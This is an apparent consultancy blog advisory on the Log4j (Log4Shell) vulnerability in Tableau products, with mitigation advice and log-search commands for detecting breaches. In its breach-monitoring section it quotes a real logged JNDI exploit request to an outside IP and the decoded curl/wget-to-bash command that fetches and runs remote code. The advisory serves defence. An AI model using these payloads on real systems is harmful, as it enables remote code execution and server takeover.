<< Back

Apache Log4j Vulnerability and Tableau

The Information Lab will be providing updates to this blog as we continue to work on vulnerability remediation with our customers.
(Last Updated: 15th Dec 2021 13:51 PM UTC)


Overview

On December 10th, 2021 our SecOps team became aware of a zero-day Java vulnerability in Log4J2 allowing for remote code execution on the host and the potential for loss of control of the system. Log4J is a Java package used in many software applications for generating log files and is also used by Tableau.


Scope of vulnerability

Any software product that runs the Log4J2 package

  • The vulnerability condition is disabled by default in version 2.15 and up but still possible.
  • The vulnerability condition is enabled by all versions below 2.15 and must be manually disabled in software code if not patched to version 2.15.


Impacted products

  • Tableau Online
  • Tableau Server 
  • Tableau Desktop
  • Tableau Prep
  • Tableau Bridge


Recommended actions


Official announcements

Monitor official announcements from Tableau/Salesforce on this page: https://status.salesforce.com/generalmessages/826


Tableau Server: Internet facing

We recommend restricting access to these servers from the internet until a patch is made available by Tableau. Discuss further risks of targeted or chained attacks from within your trusted network with your security operations team. Upgrade your environment as soon as Tableau releases a patch.


Tableau Server: Non-internet facing

We recommend monitoring your network and to discuss further risks with your security operations team. Your server could be vulnerable for targeted and chained attacks if an attack can be launched from within your trusted network. Upgrade your environment as soon as Tableau releases a patch.


Tableau Online

As Tableau Online is a SaaS solution we recommend monitoring the official announcements from Tableau/Salesforce on this as they will take the necessary steps to keep the environment safe.


Tableau Desktop

We recommend to upgrade as soon as Tableau releases a patch and to be vigilant when opening untrusted workbooks.


Tableau Prep

We recommend to upgrade as soon as Tableau releases a patch and to be vigilant when opening untrusted files.


Tableau Bridge

We recommend to upgrade as soon as Tableau releases a patch.


Monitoring for breaches

Please note that we can not guarantee that the following commands will find all breaches as the attacks are still evolving, nor can we guarantee that all breaches found are malicious (they might be scans from security tools). Please consult with your security operations team for guidance.

You can scan your Tableau Server logfiles for potential breaches using the following commands:

Windows

findstr /S /L /M /I /C jndi C:\ProgramData\Tableau\Tableau Server\data\tabsvc\logs\*.log

Linux

grep 'jndi:' – include '*log' -R /var/opt/tableau/tableau_server/data/tabsvc/logs

Responses will look similar to the following:

"GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMy4zNi4yMC4yMDk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTMuMzYuMjAuMjA5OjgwKXxiYXNo} HTTP/1.1"

Base64 decoding the string in the above GET request reveals a genuine exploit attempt to get a bash terminal on the server:

(curl -s <ip>:5874/<ip>:80||wget -q -O- <ip>:5874/<ip>:80)|bash


Note: We’ve masked the actual IPs with <ip> in above example

If you find results then we recommend shutting down the server and restore a safe backup in a new clean environment. 


Frequently asked questions


Has The Information Lab been vulnerable?

A small amount of our internal services were detected vulnerable and we’ve immediately restricted access until patches become available. We’ve investigated our services to ensure that no malicious action was taken and we haven’t found any indicators. We remain vigilant on our environment as always.


The Information Lab hosts Tableau Server for us on AWS – what actions are you taking?

We have advised all customers with Internet-facing servers to restrict access to those servers via IP whitelisting on the AWS firewall, until a patch becomes available. We have also enabled the AWS WAF mitigation described above. 

Once a patch is released we will be coordinating an upgrade program with all our hosted customers to migrate them to the new version as soon as possible. We deploy using a blue/green approach, so will spin up new infrastructure, from scratch, and restore known-good backups (taken prior to the vulnerability being made public), and decommission the existing infrastructure.    


What about The Information Lab Tableau Extensions?

None of the open-source products we offer through our Github page, such as Tableau Extensions (KeepitFresh, ExportAll, ImageViewer) or Web Data Connectors, are affected. The hosting provider we use doesn’t use any Java products for logging.


Tableau will release a maintenance patch with a fix – what can I do to prepare?

When a maintenance release with a fix becomes available it is important to make sure you’re in a good position to safely deploy the update in your environments. Tableau have a useful process map for Preparing for an Upgrade and details on how to perform the upgrade itself can be found here.


How to get more support

If you purchase your Tableau or Alteryx licences from The Information Lab, you can log a support ticket using our support service. If you do not know how to contact our support services please contact your account manager.

Please note that this document will be the primary source of general information for Log4J issues, but please feel free to log a ticket if you have something specific that you would like to ask.

You can additionally raise tickets with Tableau directly using the following link:

https://www.tableau.com/support/case


What about Alteryx Server?

Alteryx does not use Log4J and is therefore not vulnerable.


Further information and reading

Comprehensive Log4J resource: 

https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/

Log4J Issue Tracking

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046

Log4J Issue Explained: https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/ 

Our friends at Interworks have published a blog on the subject


Legal Disclaimer 

1. No liability for any errors or omissions

The information contained in this Blog has been provided by The Information Lab for information purposes only. This information does not constitute legal, professional or commercial advice. While every care has been taken to ensure that the content is useful and accurate, The Information Lab gives no guarantees, undertakings or warranties in this regard, and does not accept any legal liability or responsibility for the content or the accuracy of the information so provided, or, for any loss or damage caused arising directly or indirectly in connection with reliance on the use of such information. Any errors or omissions brought to the attention of The Information Lab will be corrected as soon as possible.

The information in this Blog may contain technical inaccuracies and typographical errors. The information in this Blog may be updated from time to time and may at times be out of date.  The Information Lab accepts no responsibility for keeping the information in this website up to date or any liability whatsoever for any failure to do so.

2. Material on this blog does not constitute legal and/or professional advice

Any views, opinions and guidance set out in this website are provided for information purposes only, and do not purport to be legal and/or professional advice or a definitive interpretation of any law. Anyone contemplating action in respect of matters set out in this website should obtain advice from a suitably qualified professional adviser based on their unique requirements.

3. No Warranty or Endorsement

The Information Lab does not make any warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, nor does it assume any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, nor does it represent that its use would not infringe privately owned rights.

4. No responsibility for other websites

When you access other external websites through a link from the website of The Information Lab, please note that The Information Lab has no control over the content on external websites. The links to external websites are provided as a matter of convenience only, and should not be taken as an endorsement by The Information Lab of the contents or practices of those external websites, for which The Information Lab assumes no responsibility or liability.

Jonathan Allenby

London, UK

Leave a Reply

Your email address will not be published. Required fields are marked *